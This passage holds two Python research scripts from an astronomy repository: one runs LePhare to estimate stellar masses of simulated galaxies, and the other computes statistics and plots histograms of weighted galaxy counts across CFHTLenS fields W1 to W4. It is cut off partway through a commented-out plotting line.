"8e6bc214c2c5e990718f5ee6ab6e7c832f09414f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14764, "license_type": "no_license", "max_line_length": 404, "num_lines": 206, "path": "/python/catalogue_utilities/MstarMillenium.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# run from the lephare_dev/test folder as: python /Users/perseus/Dropbox/Davis_work/code/MstarMillenium.py /Volumes/G-RAIDStudio/simulations/lensing_simulations/Guo_galaxies/GGL_los_8_7_7_0_0_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63.pdz number\n# where number should be different for different processes run in the same time\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nfrom scipy import special\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column\nimport time\n\nstart_timefield = time.time()\n\nlepharenr=500 # how many objects should lephare be run with\nu_millenium=np.zeros(lepharenr)\nuerr_millenium=np.zeros(lepharenr)\ng_millenium=np.zeros(lepharenr)\ngerr_millenium=np.zeros(lepharenr)\nr_millenium=np.zeros(lepharenr)\nrerr_millenium=np.zeros(lepharenr)\ni_millenium=np.zeros(lepharenr)\nierr_millenium=np.zeros(lepharenr)\nz_millenium=np.zeros(lepharenr)\nzerr_millenium=np.zeros(lepharenr)\nJ_millenium=np.zeros(lepharenr)\nJerr_millenium=np.zeros(lepharenr)\nH_millenium=np.zeros(lepharenr)\nHerr_millenium=np.zeros(lepharenr)\nKs_millenium=np.zeros(lepharenr)\nKserr_millenium=np.zeros(lepharenr)\nzbest=np.zeros(lepharenr)\nzspec=np.zeros(lepharenr)\npofz=np.zeros((lepharenr,70))\nmass_best=np.zeros((lepharenr,72)) #because I also compute for z_best,z_spec\nmass_inf=np.zeros((lepharenr,72))\nmass_med=np.zeros((lepharenr,72))\nmass_sup=np.zeros((lepharenr,72))\nz=np.linspace(0.05,3.5,70)\nos.system(\"rm %s_mstar_noJHKs.cat\" % str(sys.argv[1])[0:len(str(sys.argv[1]))-4]) # since the code only appends, if we have an incomplete previous output we should remove it\nos.system(\"rm %s_mstar_withJHKs.cat\" % str(sys.argv[1])[0:len(str(sys.argv[1]))-4])\nitrue=0\nindex=0\nname=[]\nwith open(str(sys.argv[1])) as fields:\n for gal in fields:\n index=index+1\n if gal!=\"\\n\": # careful to include this, otherwise the objects at the end of file fail to be included\n if itrue==lepharenr:\n name_in=\"/Users/perseus/lephare_dev/test/millenium_%s.cat\" % str(sys.argv[2])\n name_out=\"/Users/perseus/lephare_dev/test/millenium_%s.cat.MAG_BC03_I09.lephareout\" % str(sys.argv[2])\n for i in range(1): #with and without JHKs\n lephare_in = open(name_in,'w')\n lephare_in.write(\"# \\t ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t J \\t J_err \\t H \\t H_err \\t Ks \\t Ks_err \\t context \\t z-spec \\t string \\n\")\n list=[]\n for k in range(lepharenr): #create list of lists\n list.append([])\n for k in range(lepharenr):\n if i==0: #for zbest\n lephare_in.write('1 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 31 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zbest[k]))\n if i==1:\n lephare_in.write('1 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 255 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zbest[k]))\n if i==0: #for zspec\n lephare_in.write('2 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 31 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zspec[k]))\n if i==1:\n lephare_in.write('2 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 255 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zspec[k]))\n for j in range(70):\n if pofz[k][j]>0.001:\n list[k].append(j)\n if i==0:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 31 %s\\n' % (len(list[k])+2,u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],z[j]))\n if i==1:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 255 %s\\n' % (len(list[k])+2,u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],z[j]))\n lephare_in.close()\n os.system(\"/Users/perseus/lephare_dev/test/runlephare_phys_para_millenium.sh %s\" % name_in)\n l=0\n with open('%s' % name_out) as lephare_out:\n lineout=lephare_out.readlines()\n for k in range(lepharenr):\n mass_best[k][0]=float(lineout[62+l].split()[33]) # these first 2 are for zbest and zspec\n mass_inf[k][0]=float(lineout[62+l].split()[34])\n mass_med[k][0]=float(lineout[62+l].split()[35])\n mass_sup[k][0]=float(lineout[62+l].split()[36])\n mass_best[k][1]=float(lineout[63+l].split()[33])\n mass_inf[k][1]=float(lineout[63+l].split()[34])\n mass_med[k][1]=float(lineout[63+l].split()[35])\n mass_sup[k][1]=float(lineout[63+l].split()[36])\n l=l+2\n for j in range(len(list[k])):\n mass_best[k][list[k][j]+2]=float(lineout[62+l].split()[33])\n mass_inf[k][list[k][j]+2]=float(lineout[62+l].split()[34])\n mass_med[k][list[k][j]+2]=float(lineout[62+l].split()[35])\n mass_sup[k][list[k][j]+2]=float(lineout[62+l].split()[36])\n l=l+1\n if i==0:\n outfile=open('%s_mstar_noJHKs.cat' % str(sys.argv[1])[0:len(str(sys.argv[1]))-4],'a')\n if i==1:\n outfile=open('%s_mstar_withJHKs.cat' % str(sys.argv[1])[0:len(str(sys.argv[1]))-4],'a')\n output=\"\"\n for k in range(lepharenr):\n output=output+name[k]+\"\\t\"+str(mass_best[k][0])+\"\\t\"+str(mass_inf[k][0])+\"\\t\"+str(mass_med[k][0])+\"\\t\"+str(mass_sup[k][0])+\"\\t\"+str(mass_best[k][1])+\"\\t\"+str(mass_inf[k][1])+\"\\t\"+str(mass_med[k][1])+\"\\t\"+str(mass_sup[k][1])+\"\\t\"\n for j in range(70):\n output=output+str(mass_best[k][j+2])+\"\\t\"+str(mass_inf[k][j+2])+\"\\t\"+str(mass_med[k][j+2])+\"\\t\"+str(mass_sup[k][j+2])+\"\\t\"\n output=output+\"\\n\"\n outfile.write(output)\n outfile.close()\n name=[]\n itrue=0\n mass_best=np.zeros((lepharenr,72))\n mass_inf=np.zeros((lepharenr,72))\n mass_med=np.zeros((lepharenr,72))\n mass_sup=np.zeros((lepharenr,72))\n print \"------ running object number: \\t\", index, \"------\"\n name.append(gal.split()[0])\n u_millenium[itrue]=float(gal.split()[6])\n uerr_millenium[itrue]=float(gal.split()[7])\n g_millenium[itrue]=float(gal.split()[8])\n gerr_millenium[itrue]=float(gal.split()[9])\n r_millenium[itrue]=float(gal.split()[10])\n rerr_millenium[itrue]=float(gal.split()[11])\n i_millenium[itrue]=float(gal.split()[12])\n ierr_millenium[itrue]=float(gal.split()[13])\n z_millenium[itrue]=float(gal.split()[14])\n zerr_millenium[itrue]=float(gal.split()[15])\n J_millenium[itrue]=float(gal.split()[16])\n Jerr_millenium[itrue]=float(gal.split()[17])\n H_millenium[itrue]=float(gal.split()[18])\n Herr_millenium[itrue]=float(gal.split()[19])\n Ks_millenium[itrue]=float(gal.split()[20])\n Kserr_millenium[itrue]=float(gal.split()[21])\n zbest[itrue]=float(gal.split()[3])\n zspec[itrue]=float(gal.split()[2])\n for j in range(70): # I MODIFIED FROM 69, BUT NEED TO CHECK IF CORRECT\n #print linepdz[i].split()[j+2], \"\\n\"\n #print [x[0:len(linepdz[i].split()[j+2])-1] for x in linepdz[i].split()[j+2]], \"\\n\"\n pofz[itrue][j]=float(str(gal.split()[j+22]))\n itrue=itrue+1\n #the code below is necessary to deal with the objects at the end of the file, if there are less than lepharenr objects left\nname_in=\"/Users/perseus/lephare_dev/test/millenium_%s.cat\" % str(sys.argv[2])\nname_out=\"/Users/perseus/lephare_dev/test/millenium_%s.cat.MAG_BC03_I09.lephareout\" % str(sys.argv[2])\nfor i in range(1):\n lephare_in = open(name_in,'w')\n lephare_in.write(\"# \\t ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t J \\t J_err \\t H \\t H_err \\t Ks \\t Ks_err \\t context \\t z-spec \\t string \\n\")\n list=[]\n for k in range(itrue): #create list of lists\n list.append([])\n for k in range(itrue):\n if i==0: #for zbest\n lephare_in.write('1 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 31 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zbest[k]))\n if i==1:\n lephare_in.write('1 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 255 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zbest[k]))\n if i==0: #for zspec\n lephare_in.write('2 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 31 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zspec[k]))\n if i==1:\n lephare_in.write('2 %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 255 %s\\n' % (u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],zspec[k]))\n for j in range(70):\n if pofz[k][j]>0.001:\n list[k].append(j)\n if i==0:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 31 %s\\n' % (len(list[k])+2,u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],z[j]))\n if i==1:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s 255 %s\\n' % (len(list[k])+2,u_millenium[k],uerr_millenium[k],g_millenium[k],gerr_millenium[k],r_millenium[k],rerr_millenium[k],i_millenium[k],ierr_millenium[k],z_millenium[k],zerr_millenium[k],J_millenium[k],Jerr_millenium[k],H_millenium[k],Herr_millenium[k],Ks_millenium[k],Kserr_millenium[k],z[j]))\n lephare_in.close()\n os.system(\"/Users/perseus/lephare_dev/test/runlephare_phys_para_millenium.sh %s\" % name_in)\n l=0\n with open('%s' % name_out) as lephare_out:\n lineout=lephare_out.readlines()\n for k in range(itrue):\n mass_best[k][0]=float(lineout[62+l].split()[33])\n mass_inf[k][0]=float(lineout[62+l].split()[34])\n mass_med[k][0]=float(lineout[62+l].split()[35])\n mass_sup[k][0]=float(lineout[62+l].split()[36])\n mass_best[k][1]=float(lineout[63+l].split()[33])\n mass_inf[k][1]=float(lineout[63+l].split()[34])\n mass_med[k][1]=float(lineout[63+l].split()[35])\n mass_sup[k][1]=float(lineout[63+l].split()[36])\n l=l+2\n for j in range(len(list[k])):\n mass_best[k][list[k][j]+2]=float(lineout[62+l].split()[33])\n mass_inf[k][list[k][j]+2]=float(lineout[62+l].split()[34])\n mass_med[k][list[k][j]+2]=float(lineout[62+l].split()[35])\n mass_sup[k][list[k][j]+2]=float(lineout[62+l].split()[36])\n l=l+1\n if i==0:\n outfile=open('%s_mstar_noJHKs.cat' % str(sys.argv[1])[0:len(str(sys.argv[1]))-4],'a')\n if i==1:\n outfile=open('%s_mstar_withJHKs.cat' % str(sys.argv[1])[0:len(str(sys.argv[1]))-4],'a')\n output=\"\"\n for k in range(itrue):\n output=output+name[k]+\"\\t\"+str(mass_best[k][0])+\"\\t\"+str(mass_inf[k][0])+\"\\t\"+str(mass_med[k][0])+\"\\t\"+str(mass_sup[k][0])+\"\\t\"+str(mass_best[k][1])+\"\\t\"+str(mass_inf[k][1])+\"\\t\"+str(mass_med[k][1])+\"\\t\"+str(mass_sup[k][1])+\"\\t\"\n for j in range(70):\n output=output+str(mass_best[k][j+2])+\"\\t\"+str(mass_inf[k][j+2])+\"\\t\"+str(mass_med[k][j+2])+\"\\t\"+str(mass_sup[k][j+2])+\"\\t\"\n output=output+\"\\n\"\n outfile.write(output)\n outfile.close()\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n \nprint 'Done!'\n" }, { "alpha_fraction": 0.5192500948905945, "alphanum_fraction": 0.6131330728530884, "avg_line_length": 66.88636016845703, "blob_id": "b7a11ad3d10d2d9dc0535027f184750d6cd45060", "content_id": "cfa396991823536427da8d586a2921e9bf8b4287", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20909, "license_type": "no_license", "max_line_length": 523, "num_lines": 308, "path": "/python/catalogue_utilities/weightinguniversal_histograms_samplesORIG.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# C.E. Rusu, 12 Feb 2018\n# The code uses the weighted count ratios derived by weightinguniversal_overlap_sampling_nobeta.py to produce histograms and compute statistics. For small widths of the averages/medians distributions, where they are approximately gaussian, use this code, otherwise use weightinguniversal_histograms_samples_asymmetric.py instead\n# run as python /Users/cerusu/GITHUB/zMstarPDF/python/catalogue_utilities/weightinguniversal_histograms_samples.py WFI2033 45 5 23 meds bpz deti IRAC 0.61 0.71 100 handpicked\n\nimport numpy as np\nimport sys\nimport os\nimport time\nimport matplotlib.pyplot as plt\n\nlens = str(sys.argv[1])\nradius = str(sys.argv[2])\ninner = str(sys.argv[3])\nmag = str(sys.argv[4])\nmode = str(sys.argv[5])\nphotz = str(sys.argv[6])\ndetect = str(sys.argv[7])\nirac = str(sys.argv[8])\nzinf = str(sys.argv[9])\nzsup = str(sys.argv[10])\nbin = int(str(sys.argv[11]))\ntry: handpicked = '_'+str(sys.argv[12])\nexcept: handpicked = ''\n\nplt.clf()\n\nfontlegend = 8\nfontsize = 8\nfontordonate = 4\nfontabsciss = 10\nfontlabel = 4\npltrange = 3\nsamples = 10 # currently only works for 10\nlimit = 10**30\nroot = \"/Volumes/LaCieSubaru/weightedcounts/%s/\" % lens\n\nstart_time = time.time()\n\nprint \"Working on samples:\"\n\nmedsum50W1 = np.zeros((18,samples))\nmedsum75W1 = np.zeros((18,samples))\nmedsum50W2 = np.zeros((18,samples))\nmedsum75W2 = np.zeros((18,samples))\nmedsum50W3 = np.zeros((18,samples))\nmedsum75W3 = np.zeros((18,samples))\nmedsum50W4 = np.zeros((18,samples))\nmedsum75W4 = np.zeros((18,samples))\n\nfor nr in range(samples):\n print '%s/9' %nr\n lstW1_50 = [x for x in os.listdir(root) if ('W1' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)] # select from the files in the root directory\n lstW1_75 = [x for x in os.listdir(root) if ('W1' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)]\n lstW2_50 = [x for x in os.listdir(root) if ('W2' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)]\n lstW2_75 = [x for x in os.listdir(root) if ('W2' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)]\n lstW3_50 = [x for x in os.listdir(root) if ('W3' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)]\n lstW3_75 = [x for x in os.listdir(root) if ('W3' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)]\n lstW4_50 = [x for x in os.listdir(root) if ('W4' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)]\n lstW4_75 = [x for x in os.listdir(root) if ('W4' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr)) in x)]\n\n if mag == \"24\" and photz == \"bpz\": cols=[4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38]\n if mag == \"24\" and photz == \"eazy\": cols=[40,42,44,46,48,50,52,54,56,58,60,62,64,66,68,70,72,74]\n if mag == \"23\" and photz == \"bpz\": cols=[5,7,9,11,13,15,17,19,21,23,25,27,29,31,33,35,37,39]\n if mag == \"23\" and photz == \"eazy\": cols=[41,43,45,47,49,51,53,55,57,59,61,63,65,67,69,71,73,75]\n \n print \"W1...\"\n for i in range(len(lstW1_50)):\n if i == 0:\n q_W1_50read = np.loadtxt(root+lstW1_50[i], usecols=cols, unpack=True)\n else:\n q_W1_50read = np.r_['1',q_W1_50read,np.loadtxt(root+ lstW1_50[i], usecols=cols, unpack=True)]\n for i in range(len(lstW1_75)):\n if i == 0:\n q_W1_75read = np.loadtxt(root+lstW1_75[i], usecols=cols, unpack=True)\n else:\n q_W1_75read = np.r_['1',q_W1_75read,np.loadtxt(root+ lstW1_75[i], usecols=cols, unpack=True)]\n \n print \"W2...\"\n for i in range(len(lstW2_50)):\n if i == 0:\n q_W2_50read = np.loadtxt(root+lstW2_50[i], usecols=cols, unpack=True)\n else:\n q_W2_50read = np.r_['1',q_W2_50read,np.loadtxt(root+ lstW2_50[i], usecols=cols, unpack=True)]\n for i in range(len(lstW2_75)):\n if i == 0:\n q_W2_75read = np.loadtxt(root+lstW2_75[i], usecols=cols, unpack=True)\n else:\n q_W2_75read = np.r_['1',q_W2_75read,np.loadtxt(root+ lstW2_75[i], usecols=cols, unpack=True)]\n \n print \"W3...\"\n for i in range(len(lstW3_50)):\n if i == 0:\n q_W3_50read = np.loadtxt(root+lstW3_50[i], usecols=cols, unpack=True)\n else:\n q_W3_50read = np.r_['1',q_W3_50read,np.loadtxt(root+ lstW3_50[i], usecols=cols, unpack=True)]\n for i in range(len(lstW3_75)):\n if i == 0:\n q_W3_75read = np.loadtxt(root+lstW3_75[i], usecols=cols, unpack=True)\n else:\n q_W3_75read = np.r_['1',q_W3_75read,np.loadtxt(root+ lstW3_75[i], usecols=cols, unpack=True)]\n \n print \"W4...\"\n for i in range(len(lstW4_50)):\n if i == 0:\n q_W4_50read = np.loadtxt(root+lstW4_50[i], usecols=cols, unpack=True)\n else:\n q_W4_50read = np.r_['1',q_W4_50read,np.loadtxt(root+ lstW4_50[i], usecols=cols, unpack=True)]\n for i in range(len(lstW4_75)):\n if i == 0:\n q_W4_75read = np.loadtxt(root+lstW4_75[i], usecols=cols, unpack=True)\n else:\n q_W4_75read = np.r_['1',q_W4_75read,np.loadtxt(root+ lstW4_75[i], usecols=cols, unpack=True)]\n \n for j in range(18):\n q_W1_50 = q_W1_50read[j][q_W1_50read[j] < limit]\n if mode == \"sum\": q_W1_50 = abs(q_W1_50) # fix the negative halo convergence\n q_W1_75 = q_W1_75read[j][q_W1_75read[j] < limit]\n if mode == \"sum\": q_W1_75 = abs(q_W1_75)\n q_W2_50 = q_W2_50read[j][q_W2_50read[j] < limit]\n if mode == \"sum\": q_W2_50 = abs(q_W2_50) # fix the negative halo convergence\n q_W2_75 = q_W2_75read[j][q_W2_75read[j] < limit]\n if mode == \"sum\": q_W2_75 = abs(q_W2_75)\n q_W3_50 = q_W3_50read[j][q_W3_50read[j] < limit]\n if mode == \"sum\": q_W3_50 = abs(q_W3_50) # fix the negative halo convergence\n q_W3_75 = q_W3_75read[j][q_W3_75read[j] < limit]\n if mode == \"sum\": q_W3_75 = abs(q_W3_75)\n q_W4_50 = q_W4_50read[j][q_W4_50read[j] < limit]\n if mode == \"sum\": q_W4_50 = abs(q_W4_50) # fix the negative halo convergence\n q_W4_75 = q_W4_75read[j][q_W4_75read[j] < limit]\n if mode == \"sum\": q_W4_75 = abs(q_W4_75)\n\n if mode == \"sum\":\n medsum50W1[j][nr] = np.average(q_W1_50)\n medsum75W1[j][nr] = np.average(q_W1_75)\n medsum50W2[j][nr] = np.average(q_W2_50)\n medsum75W2[j][nr] = np.average(q_W2_75)\n medsum50W3[j][nr] = np.average(q_W3_50)\n medsum75W3[j][nr] = np.average(q_W3_75)\n medsum50W4[j][nr] = np.average(q_W4_50)\n medsum75W4[j][nr] = np.average(q_W4_75)\n if mode == \"meds\":\n medsum50W1[j][nr] = np.median(q_W1_50)\n medsum75W1[j][nr] = np.median(q_W1_75)\n medsum50W2[j][nr] = np.median(q_W2_50)\n medsum75W2[j][nr] = np.median(q_W2_75)\n medsum50W3[j][nr] = np.median(q_W3_50)\n medsum75W3[j][nr] = np.median(q_W3_75)\n medsum50W4[j][nr] = np.median(q_W4_50)\n medsum75W4[j][nr] = np.median(q_W4_75)\n \nstd50W1 = np.zeros(18)\nstd75W1 = np.zeros(18)\nstd50W2 = np.zeros(18)\nstd75W2 = np.zeros(18)\nstd50W3 = np.zeros(18)\nstd75W3 = np.zeros(18)\nstd50W4 = np.zeros(18)\nstd75W4 = np.zeros(18)\n\nfor i in range(18):\n std50W1[i] = np.std(medsum50W1[i],ddof=1) # ddof=1 stands for sample standard deviation, not population standard deviation\n std75W1[i] = np.std(medsum75W1[i],ddof=1)\n std50W2[i] = np.std(medsum50W2[i],ddof=1)\n std75W2[i] = np.std(medsum75W2[i],ddof=1)\n std50W3[i] = np.std(medsum50W3[i],ddof=1)\n std75W3[i] = np.std(medsum75W3[i],ddof=1)\n std50W4[i] = np.std(medsum50W4[i],ddof=1)\n std75W4[i] = np.std(medsum75W4[i],ddof=1)\n\nprint \"Plotting...\"\n\nplt.suptitle(r'%s weighted counts histogram W1-W4 %s arcsec %s inner %s %s %s %s %s %s zgap %s %s' % (lens, radius, inner, mag, mode, photz, irac, detect, handpicked, zinf, zsup), fontsize=fontsize, y=0.998)\n\nfor i in range(18):\n\n #n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax]) # in case I want to compute the peak\n #n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n #n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n #n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n #n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n #n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n #n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n #n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n \n if i == 0: ax=plt.subplot(5,4,1)\n if i == 1: ax=plt.subplot(5,4,2)\n if i == 2: ax=plt.subplot(5,4,3)\n if i == 3: ax=plt.subplot(5,4,4)\n if i == 4: ax=plt.subplot(5,4,5)\n if i == 5: ax=plt.subplot(5,4,6)\n if i == 6: ax=plt.subplot(5,4,7)\n if i == 7: ax=plt.subplot(5,4,8)\n if i == 8: ax=plt.subplot(5,4,9)\n if i == 9: ax=plt.subplot(5,4,10)\n if i == 10: ax=plt.subplot(5,4,11)\n if i == 11: ax=plt.subplot(5,4,12)\n if i == 12: ax=plt.subplot(5,4,13)\n if i == 13: ax=plt.subplot(5,4,14)\n if i == 14: ax=plt.subplot(5,4,15)\n if i == 15: ax=plt.subplot(5,4,17)\n if i == 16: ax=plt.subplot(5,4,18)\n if i == 17: ax=plt.subplot(5,4,19)\n \n q_W1_50 = q_W1_50read[i][q_W1_50read[i] < limit]\n if mode == \"sum\": q_W1_50 = abs(q_W1_50) # fix the negative halo convergence\n q_W1_75 = q_W1_75read[i][q_W1_75read[i] < limit]\n if mode == \"sum\": q_W1_75 = abs(q_W1_75)\n q_W2_50 = q_W2_50read[i][q_W2_50read[i] < limit]\n if mode == \"sum\": q_W2_50 = abs(q_W2_50) # fix the negative halo convergence\n q_W2_75 = q_W2_75read[i][q_W2_75read[i] < limit]\n if mode == \"sum\": q_W2_75 = abs(q_W2_75)\n q_W3_50 = q_W3_50read[i][q_W3_50read[i] < limit]\n if mode == \"sum\": q_W3_50 = abs(q_W3_50) # fix the negative halo convergence\n q_W3_75 = q_W3_75read[i][q_W3_75read[i] < limit]\n if mode == \"sum\": q_W3_75 = abs(q_W3_75)\n q_W4_50 = q_W4_50read[i][q_W4_50read[i] < limit]\n if mode == \"sum\": q_W4_50 = abs(q_W4_50) # fix the negative halo convergence\n q_W4_75 = q_W4_75read[i][q_W4_75read[i] < limit]\n if mode == \"sum\": q_W4_75 = abs(q_W4_75)\n \n plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n \n #s = \"50: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\n ##ax.text(0.05, 0.8, s, fontsize=fontlabel, color='b',transform=ax.transAxes)\n #s = \"50: peak = 